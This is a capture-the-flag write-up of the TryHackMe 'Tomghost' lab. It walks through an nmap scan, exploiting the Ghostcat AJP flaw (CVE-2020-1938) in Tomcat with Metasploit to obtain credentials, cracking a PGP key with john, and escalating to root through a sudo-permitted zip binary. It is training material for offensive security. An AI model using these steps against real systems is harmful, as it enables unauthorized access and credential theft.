TomGhost CTF

Hello Everyone,

Machine Tomghost hosted on @tryhackme focus on CVE-2020-1938 (CVSS Score 7.5)

when the Server is using AJP and unauthorized users can access those services which could lead to Remote Code Execution to the Server.

let's boot up the machine and start with a simple Nmap scan.

# Nmap 7.80 scan initiated Sun Mar 13 15:15:29 2022 as: nmap -Pn -A -vvv -sV -sC -oA normal 10.10.16.253
Nmap scan report for 10.10.16.253
Host is up, received user-set (0.15s latency).
Scanned at 2022-03-13 15:15:29 IST for 32s
Not shown: 996 closed ports
Reason: 996 conn-refused
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQvC8xe2qKLoPG3vaJagEW2eW4juBu9nJvn53nRjyw7y/0GEWIxE1KqcPXZiL+RKfkKA7RJNTXN2W9kCG8i6JdVWs2x9wD28UtwYxcyo6M9dQ7i2mXlJpTHtSncOoufSA45eqWT4GY+iEaBekWhnxWM+TrFOMNS5bpmUXrjuBR2JtN9a9cqHQ2zGdSlN+jLYi2Z5C7IVqxYb9yw5RBV5+bX7J4dvHNIs3otGDeGJ8oXVhd+aELUN8/C2p5bVqpGk04KI2gGEyU611v3eOzoP6obem9vsk7Kkgsw7eRNt1+CBrwWldPr8hy6nhA6Oi5qmJgK1x+fCmsfLSH3sz1z4Ln
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOscw5angd6i9vsr7MfCAugRPvtx/aLjNzjAvoFEkwKeO53N01Dn17eJxrbIWEj33sp8nzx1Lillg/XM+Lk69CQ=
|   256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGqgzoXzgz5QIhEWm3+Mysrwk89YW2cd2Nmad+PrE4jw
53/tcp   open  tcpwrapped syn-ack
8009/tcp open  ajp13      syn-ack Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       syn-ack Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 13 15:16:01 2022 -- 1 IP address (1 host up) scanned in 32.87 seconds

port 22,53,8009,8080 are running on the server. and are able to find tomcat 9.0.30 is running by googling is we were able to find the exploit with Metasploit

msf > search tomcat 9.0 
msf > use 0
msf > show options

msf>set rhost <IP>
msf>run

with that, we got our credentials
lest connect with ssh by

ssh skyfuck@<IP>

and we got into the server

by running ls we were able to find tryhackme.acs and credential.pgp

ls -la

copy that file to thelocal machine with SCP

now we need to crack PGP with john by running

gpg3john tryhackme.asc > hash

now run

john --wordlist=rockyou.txt hash

with that, we got credentials of tryhackme.let’s decrypt credential.pgp by and enter password

gpg --decrypt credential.pgp

by decrypting credential.pgp we got password for user merline

ssh to merline and cat user.txt we got our 1st flag

for privilege escalation run

sudo -l

we can run zip with user root without password. lets look for zip in gtfobins to escalate our privileges by running following command we were successfully escalated our privileges

root flag

#cat ~/root.txt

the main objective of this machine was Ghost Cat exploit, and escalate our privileges with zip binary.

hope you like this blog and thanks for reading it
happy hacking!